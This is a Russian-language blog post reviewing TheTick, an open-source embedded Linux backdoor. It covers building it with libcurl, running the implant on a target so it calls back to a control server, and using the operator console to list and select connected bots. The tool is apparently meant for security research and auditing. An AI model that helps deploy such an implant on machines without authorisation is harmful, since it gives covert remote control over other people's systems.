🔎 TheTick – простой встроенный бэкдор Linux |
Главная » Обзоры

🔎 TheTick – простой встроенный бэкдор Linux

Обзоры
На чтение 2 мин Опубликовано

Простой встроенный бэкдор Linux.

Содержание
  1. Сборка
  2. Установка
  3. Использование
  4. Скачать TheTick

Сборка

TheTick зависит только от libcurl, поэтому убедитесь, что у вас есть соответствующий пакет разработки.

Например, в дистрибутивах на основе Debian вы должны сделать следующее:

sudo apt-get install libcurl-dev
Как только зависимости установлены, просто запустите makefile:
cd src
make clean
make

Установка

Получение стойкости  бэкдора будет сильно зависеть от целевой платформы, и поэтому здесь это не задокументировано.

На целевом компьютере запустите бинарный файл со следующими аргументами:

./ticksvc ADDR PORT

Где «ADDR» и «PORT» должны быть заменены IP-адресом и портом, которые будут слушать команды и консоль.

Порт по умолчанию – 5555.

Консоль управления и команд не требует установки, но может иметь неразрешенные зависимости.

Выполните следующую команду, чтобы убедиться, что все зависимости установлены правильно (обратите внимание, что для этого не требуется sudo):

pip install --upgrade -r requirements.txt

В большинстве сред рабочего стола Linux следующий файл «Tick.desktop» создаст значок, который вы можете дважды щелкнуть для запуска консоли:

[Desktop Entry]
Encoding=UTF-8
Value=1.0
Type=Application
Name=The Tick
GenericName=The Tick
Comment=An embedded Linux backdoor
Icon=/opt/thetick/doc/logo.png
Exec=/opt/thetick/tick.py
Terminal=true
Path=/opt/thetick/
Точное местоположение файла Tick.desktop может отличаться в разных дистрибутивах Linux, но обычно его размещение на рабочем столе должно работать.
Обязательно отредактируйте путь к тому месту, куда вы скачали The Tick  (/opt/thetick в приведенном выше примере).

Использование

Чтобы запустить двоичный файл бэкдора на целевой платформе, задайте имя хоста и порт сервера управления в качестве параметров командной строки.

Например:

./ticksvc control.example-domain.com 5555
На сервере управления вы можете запустить консоль внутри экземпляра экрана GNU или аналогичного:
sudo apt-get install screen
screen -S thetick ./thetick.py
Таким образом, вы можете отсоединиться от консоли, нажав Control + A, а затем D.
Вы можете вернуться к консоли позже:
screen -r thetick

Консоль сообщит вам, когда к ней подключится новый бот.

Используйте команду «bots», чтобы показать подключенных в данный момент ботов, а команда «use» выберет бота для работы.

Команда «help» показывает руководство пользователя.

Вот несколько скриншотов, иллюстрирующих возможности консоли:

Скачать TheTick

¯\_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

backdoor debian linux ubuntu
Пожалуйста, не спамьте и никого не оскорбляйте. Это поле для комментариев, а не спамбокс. Рекламные ссылки не индексируются!
Добавить комментарий